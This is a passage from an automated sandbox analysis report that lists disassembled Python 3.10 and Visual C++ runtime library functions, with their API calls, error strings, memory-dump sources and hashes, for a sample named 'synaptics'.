                                                                                                                                                                                                        • Part of subcall function 6C553610: PyImport_Import.PYTHON310(00000000,?,?,?,?,?,?,?,?,00000001,?,?,?,?,?,00000000), ref: 6C553759
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BFE8,00000000,00000000,00000000,00000000), ref: 6C550D6F
                                                                                                                                                                                                      • PyList_Append.PYTHON310(00000000,?), ref: 6C550D9D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • bad argument type for built-in operation, xrefs: 6C550D27
                                                                                                                                                                                                      • argument must be callable, xrefs: 6C550D5A
                                                                                                                                                                                                      • PyThreadState_Get, xrefs: 6C550CD6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_FromList_ObjectStringUnicode_$AppendImportImport_Method_
                                                                                                                                                                                                      • String ID: PyThreadState_Get$argument must be callable$bad argument type for built-in operation
                                                                                                                                                                                                      • API String ID: 3989617231-3004562976
                                                                                                                                                                                                      • Opcode ID: 380cdfc0432dcd6b7c3733c33a881d0d244bf4e5d3f04cae5567628bbe2fa285
                                                                                                                                                                                                      • Instruction ID: a25556eec43052cdf2724ca618e0533af83c431d44f1f229710b123709b98932
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 380cdfc0432dcd6b7c3733c33a881d0d244bf4e5d3f04cae5567628bbe2fa285
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BF0D6716042099BDB009A9ADC84AA277B89F8133CF840766E92887AD1E770BC5086F1
                                                                                                                                                                                                      Function 6C56EF60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Python\getargs.c,00000584), ref: 6C56EFCD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C56EFC1
                                                                                                                                                                                                      • D:\a\1\s\Python\getargs.c, xrefs: 6C56EFBC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Python\getargs.c
                                                                                                                                                                                                      • API String ID: 376477240-2609708910
                                                                                                                                                                                                      • Opcode ID: d1909ed3fa1d9fd868dd6c109af231651136c73913d685ee524472580ea64592
                                                                                                                                                                                                      • Instruction ID: 6fa9953d3208bf3d3f686c873d492641b1f902d387c8d7c6de2ca27c5a1061d1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1909ed3fa1d9fd868dd6c109af231651136c73913d685ee524472580ea64592
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F0184767022059BEB00CE56DC01F9AB7B4AB80709F108414F9185BEA1C771E595CBE1
                                                                                                                                                                                                      Function 6C4DCF80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_DecodeUnicodeEscapeInternal.PYTHON310(?,?,?,?,?), ref: 6C4DCF95
                                                                                                                                                                                                      • PyErr_WarnFormat.PYTHON310(00000001,invalid escape sequence '\%c'), ref: 6C4DCFBB
                                                                                                                                                                                                        • Part of subcall function 6C53CFB0: PyUnicode_FromFormatV.PYTHON310(?,?,00000000,?,6C450F1E,00000001,__index__ returned non-int (type %.200s). The ability to return an instance of a strict subclass of int is deprecated, and may be removed in a future version of Python.,?), ref: 6C53CFBB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • invalid escape sequence '\%c', xrefs: 6C4DCFAE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FormatUnicode_$DecodeErr_EscapeFromInternalUnicodeWarn
                                                                                                                                                                                                      • String ID: invalid escape sequence '\%c'
                                                                                                                                                                                                      • API String ID: 906445433-3981385198
                                                                                                                                                                                                      • Opcode ID: 26d9a4fd196df33bc081f54a88992e19a84dc5eee0db48a1c172980180cac825
                                                                                                                                                                                                      • Instruction ID: 7b5e40ebbabe9d5486be14901ae1889503c87476d2b7b9e3bdc13c72b046da1f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26d9a4fd196df33bc081f54a88992e19a84dc5eee0db48a1c172980180cac825
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4F0A4726511186BDB10FE94DC01EEA77A9DB05225B0502A9FD18D6690F362EE2097D2
                                                                                                                                                                                                      Function 6C4A08F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: ,\nl
                                                                                                                                                                                                      • API String ID: 0-672968349
                                                                                                                                                                                                      • Opcode ID: 5931b867a0e3fff4e63610b4f817e5329963cf63e82ec16022156d7dee9fee85
                                                                                                                                                                                                      • Instruction ID: 4a2801fb3557b20edf7a63ed63db92373c34aee4f4c17e5a7df23e02654c1ab1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5931b867a0e3fff4e63610b4f817e5329963cf63e82ec16022156d7dee9fee85
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EF04CB19041112BE2108DA8AC11FD6B78C8F21379F104354FC7A977E4DE61ED07C5D5
                                                                                                                                                                                                      Function 6C57EA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _Py_PreInitializeFromConfig.PYTHON310(?,?,00000000), ref: 6C57EA52
                                                                                                                                                                                                        • Part of subcall function 6C588900: _PyRuntimeState_Init.PYTHON310(?,6C77B000), ref: 6C58893D
                                                                                                                                                                                                      • _PyWideStringList_Copy.PYTHON310(?,?), ref: 6C57EA80
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ConfigCopyFromInitInitializeList_RuntimeState_StringWide
                                                                                                                                                                                                      • String ID: pl
                                                                                                                                                                                                      • API String ID: 4234429762-110354498
                                                                                                                                                                                                      • Opcode ID: a329a8c83a7f7d415249f1362a64bd2a45217df9cd99b5eeecb64c84336a9c1e
                                                                                                                                                                                                      • Instruction ID: a35c28e3fb3a7cf054ecb7feb827b0d9982a380ad1f40f78b0c033c0805e3bbe
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a329a8c83a7f7d415249f1362a64bd2a45217df9cd99b5eeecb64c84336a9c1e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70016DB14047088FDB11CF14D806B957BE4EB45318F05C195EC4C8B761E37299A4CB92
                                                                                                                                                                                                      Function 73A87550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,73A87292,?,73A8EFF8), ref: 73A87580
                                                                                                                                                                                                      • RaiseException.KERNEL32(E06D7363,00000001,00000003,73A87292,?,?,?,73A87292,?,73A8EFF8), ref: 73A875B0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionRaise__telemetry_main_return_trigger
                                                                                                                                                                                                      • String ID: Bad dynamic_cast!
                                                                                                                                                                                                      • API String ID: 201792006-2956939130
                                                                                                                                                                                                      • Opcode ID: 50bdfa028986441a4d0f8cb0bda158c11c366ccb873a79a94435d526b9ad2817
                                                                                                                                                                                                      • Instruction ID: 81321504779a0bf88af42056b9c8cd1a29fad15909eaa180fbfddbee8fb49925
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50bdfa028986441a4d0f8cb0bda158c11c366ccb873a79a94435d526b9ad2817
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB01A276900208AFCB069F59D481BAEBFB8FF8C714F15415BE906AB394D771E942CB90
                                                                                                                                                                                                      Function 6C460B00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyBytes_DecodeEscape.PYTHON310(?,?,?,?), ref: 6C460B12
                                                                                                                                                                                                        • Part of subcall function 6C4606D0: _PyBytesWriter_Prepare.PYTHON310 ref: 6C46072D
                                                                                                                                                                                                        • Part of subcall function 6C4606D0: _PyBytesWriter_Finish.PYTHON310(?,00000000), ref: 6C46097D
                                                                                                                                                                                                      • PyErr_WarnFormat.PYTHON310(00000001,invalid escape sequence '\%c'), ref: 6C460B38
                                                                                                                                                                                                        • Part of subcall function 6C53CFB0: PyUnicode_FromFormatV.PYTHON310(?,?,00000000,?,6C450F1E,00000001,__index__ returned non-int (type %.200s). The ability to return an instance of a strict subclass of int is deprecated, and may be removed in a future version of Python.,?), ref: 6C53CFBB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • invalid escape sequence '\%c', xrefs: 6C460B2B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BytesFormatWriter_$Bytes_DecodeErr_EscapeFinishFromPrepareUnicode_Warn
                                                                                                                                                                                                      • String ID: invalid escape sequence '\%c'
                                                                                                                                                                                                      • API String ID: 227876891-3981385198
                                                                                                                                                                                                      • Opcode ID: 03fcd7be542a0735bdc077cc4ef5908725056a99446e27b46d651b6dc4eaf734
                                                                                                                                                                                                      • Instruction ID: f598a437ef78fe22445a60b9829150822f5460f987dff90286d53e85b49d036c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03fcd7be542a0735bdc077cc4ef5908725056a99446e27b46d651b6dc4eaf734
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9F02272A101186BDB01DEE9DC01DA677ECDB00629F0006A5FD2CC7A50F772DE2087D4
                                                                                                                                                                                                      Function 6C56EFE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Python\getargs.c,0000059E), ref: 6C56F04C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C56F040
                                                                                                                                                                                                      • D:\a\1\s\Python\getargs.c, xrefs: 6C56F03B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Python\getargs.c
                                                                                                                                                                                                      • API String ID: 376477240-2609708910
                                                                                                                                                                                                      • Opcode ID: dd8954becb3a8ca5635daa75facfeffa9c5e0a397e8df9a973d639a03aadd3fa
                                                                                                                                                                                                      • Instruction ID: 6783fc1cbad72b969477975e7b19a3a4a0b7508b84c41952f00be9dd9d5ad8d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd8954becb3a8ca5635daa75facfeffa9c5e0a397e8df9a973d639a03aadd3fa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B501A272B01209DFEF01CE51DD41B9E3BA4AF44358F108115F8194AE62D731E9E1DB91
                                                                                                                                                                                                      Function 6C551B00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyDict_SetItemString.PYTHON310(?,?,?), ref: 6C551B3C
                                                                                                                                                                                                        • Part of subcall function 6C553610: PyList_New.PYTHON310(00000000,00000000,?,00000001,?,?,?,?,?,00000000,?,?,?,6C4DA72B,?,?), ref: 6C553637
                                                                                                                                                                                                        • Part of subcall function 6C553610: PyCMethod_New.PYTHON310(6C74DD84,00000000,00000000,00000000,00000001,?,?,?,?,?,00000000,?,?,?,6C4DA72B,?), ref: 6C5536A2
                                                                                                                                                                                                        • Part of subcall function 6C553610: PyUnicode_FromString.PYTHON310(encodings,?,?,?,?,?,?,?,00000001,?,?,?,?,?,00000000), ref: 6C55374A
                                                                                                                                                                                                        • Part of subcall function 6C553610: PyImport_Import.PYTHON310(00000000,?,?,?,?,?,?,?,?,00000001,?,?,?,?,?,00000000), ref: 6C553759
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BFE8,handler must be callable), ref: 6C551B60
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • handler must be callable, xrefs: 6C551B59
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$Err_$Dict_FromImportImport_ItemList_Method_ObjectUnicode_
                                                                                                                                                                                                      • String ID: handler must be callable
                                                                                                                                                                                                      • API String ID: 287625-2788139689
                                                                                                                                                                                                      • Opcode ID: c96c79c88eb4525e04238976046323c18794f5b8e1047cb981b33a9c48a19e70
                                                                                                                                                                                                      • Instruction ID: 5ef9174978c56eb8773e911f9a1f8ba90d424bcdf305ea610e1acede680c4882
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c96c79c88eb4525e04238976046323c18794f5b8e1047cb981b33a9c48a19e70
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10F02831A041089BCB108E55EC05ED677999B4133DF44426AEC2C87BA0FB71EC64C3D1
                                                                                                                                                                                                      Function 6C54FE40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyNumber_AsSsize_t.PYTHON310(?,00000000), ref: 6C54FE6B
                                                                                                                                                                                                        • Part of subcall function 6C450FB0: _PyNumber_Index.PYTHON310(?,?,?,6C44EED1), ref: 6C450FB7
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,slice indices must be integers or None or have an __index__ method,?,?,6C4B151E,?,?), ref: 6C54FE99
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • slice indices must be integers or None or have an __index__ method, xrefs: 6C54FE8D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
